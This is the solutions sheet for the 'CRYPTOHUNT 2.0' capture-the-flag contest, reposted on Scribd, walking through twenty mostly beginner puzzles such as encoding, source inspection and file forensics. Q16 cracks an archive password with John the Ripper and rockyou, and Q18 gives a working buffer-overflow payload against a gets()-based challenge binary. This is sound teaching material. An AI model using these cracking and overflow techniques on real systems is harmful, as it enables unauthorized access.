Scribd
Upload
15 views

Solutions

Uploaded by

prat0ham
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
15 views

Solutions

Uploaded by

prat0ham
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 6

Solutions

CRYPTOHUNT 2.0

Solutions

1. Can you convert the number 129 (base 10) to binary (base 2)?

# Python 3
>>> bin(129)
'0b10000001'

TCF{10000001}

2. If we give you a hex (596f75476f74546869734f6e65546f6f), can you find the string from it?

# Python 3
>>> bytes().fromhex('596f75476f74546869734f6e65546f6f').decode('utf-
8')
'YouGotThisOneToo'

TCF{YouGotThisOneToo}

3. Flag is in front you, Now you have to find it with your MIND.
Image
The positions of letters in English alphabetical series is given. Simply replace the numbers with the
letters to get the flag.

TCF{STRINGVILLA}

4. The forest beholds all the secrets. Can you find the one we are looking for?
Forest
Download the image and open it in hex mode. The flag is appended at the end of the file.

TCF{APictureWorthAThousandWords}

5. Lex wants to secure his room access. So he creates a Java Program to protect his room with
password. Given below the Java Program, can you crack the code to his first room?
Source
The attached file is a java source code. Open it and the flag can be found towards the end of the
file.

TCF{DoYouReallyWantToEnterTheRoom?}

6. How do you hide a message in a static website? HTML? CSS? JS?


Webpage
Visit the linked webpage, and view it's source. A css file jisafkhajgsdask.css is loaded, open
that to get the flag.

TCF{YouGuessedItRightCSS}

7. We give you a file. You can't run it. But the file has the flag. Uhm! How can you find it?
File
Run strings command on the attached file and search for the Flag (Use regex to look for
anything matching the flag format)

$ strings strings | grep -oh "TCF{\w*}"


TCF{TheFlagIsHereRightHere}

TCF{TheFlagIsHereRightHere}

8. Caesar Cipher. Well the file has the Flag, but does it?
File
The flag is encoded with Caesar Cipher with shift +11. You can try bruteforcing the shift and look for
the output that makes sense.

TCF{damnityouaresmart}

9. Lex Knows you cracked the first one. That wasy easy. Not so easy this time.
Source
The attached java file have a method that validates password character by character. You can use
this to build up the password to get the flag.

TCF{PasswordIsImpenetrableButYouHack}

10. How well do you know about the Extensions


File
To check the type of content of the file (irrespective of the extension), you can either check the
Header of the files and compare them against the Magic numbers of knows file types, or simply you
can use file command.

$ file theFile.txt
theFile.txt: JPEG image data, JFIF standard 1.01, aspect ratio, density
1x1, segment length 16, progressive, precision 8, 648x1210, components
3

We can see the file is a JPEG image. Open it up with any image viewer(or rename the extension to
.jpg) to get the flag.

TCF{YOU_MADE_IT_WITH_EXTENSIONS}

11. Show your skill of website and catch the flag.


Webpage
Check the source of the attached file. The flag is split into 3 parts:

1/3 is in a comment in html file

2/3 is in a comment in mycss.css file

3/3 is in a comment in myjs.js file

TCF{tru3_farm3r5_0r_ju5t_lucky?9df7e69a}

12. Can You Unzip this File ? If yes then find the Flag. If No, Be like Sherlock.
File
Extract the attached file with password cryptohunt

TCF{unz1pp1ng_1s_3a5y}

13. Secure Webpages are hard to crack. Our friend Antonio Provided security. Can you crack it?
Webpage
The flag can be found in the file adfjhbakjdvaihdfv.js that is loaded with the webage

TCF{PasswordInPlainJSNotSoSecure}

14. Lex is pretty sure, someone is hacking into his door. He ordered Highlevel security. Go ahead
Agent, crack it!
Source
The checkPassword method in the attached file can be traced to get the flag.
TCF{jU5t_a_s1mpl3_an4gr4m_4_u_c79a21}

15. You came a long way. Come see my first website.


Website
Visiting the website and checking the source, we can see a comment that says only robots can
read the flag. The flag is inside another html file that is mentioned in the robots.txt file.

TCF{I_aM_nOt_A_rObOt?AS25LW}

16. Time to fight your way in


File
The password for the archive can be found by bruteforcing the password against the rockyou.txt
dictionary file.
(Using John the Ripper)

$ /usr/share/john/7z2john.pl Q16.7z > Q16.hash


$ john --wordlist=/usr/share/wordlists/rockyou.txt Q16.hash
chocolate (Q16.7z)

The password is chocolate

TCF{i_Am_StRoNk!69ty420}

17. Let's get mobile.


Application
The attached file is an Android application. You can use Bytecode-Viewer to decompile the
compiled application and view the .class files. The password can be found by tracing the
checkPassword in the class file com/tcf/q17/Password$Companion.class

TCF{i_CaN_rEaD_jAvA!28fe7}

18. Given a binary, execute it and get the flag. Simple?


Source
Binary
From the given source, we can see that the flag will be generated by the win() function. We have
to somehow call that function in the binary. We also see that the main() function is using gets()
function to take in input. gets() is vulnerable to Buffer Overflow, we can leak our input from the
input buffer and write values to the fp pointer, which can be used to call the win function. To do so,
we will find the address of win() function and then Overflow that address in the input buffer of
gets() .

$ objdump -d breakMe | grep '<win>'


080491d6 <win>:
$ perl -e 'print "A"x64 . "\xd6\x91\x04\x08\n"' | ./breakMe
Whooaa, thats a lot of text, jumping to 0x080491d6
TCF{wE_hAvE_a_HaCkEr_AmOnG_uS!pr0}

TCF{wE_hAvE_a_HaCkEr_AmOnG_uS!pr0}

19. Let's build from the ground up


Image
On observing the attached image closely, it can be guessed that the flag may be encoded as the
length of the lines, i.e., We can count how many pixels long a line is and can convert that number to
its corresponding ASCII text. To do so, the following simple python script can be used:

from PIL import Image


image = Image.open('q19.png')
height, width = image.size
pixels = image.load()
black = (0, 0, 0)
d = dict()
for x in range(height):
for y in range(width):
if not pixels[x, y] == black:
if y in d.keys():
d[y].append(x)
else:
d[y] = list()
d[y].append(x)
for k in d.keys():
print(chr(max(d[k]) - 100), end='')

TCF{nOw_ThIs_Is_GeTtInG_sErIoUs}

20. Let's break in the flag bank


Source
Binary
After checking the source, one can conclude that they have to somehow overflow the value of the
int variable used to increase the current balance. This can be done by repeatedly purching the
fake flags and passing quantity with a value that will overlflow the int range. Since there is no
checks for the corner cases, the currentBalance will increase instead of decreasing after every
purchase.

TCF{yOu_SiR_hAvE_mY_rEsPeCt!p0gch@mp}

You might also like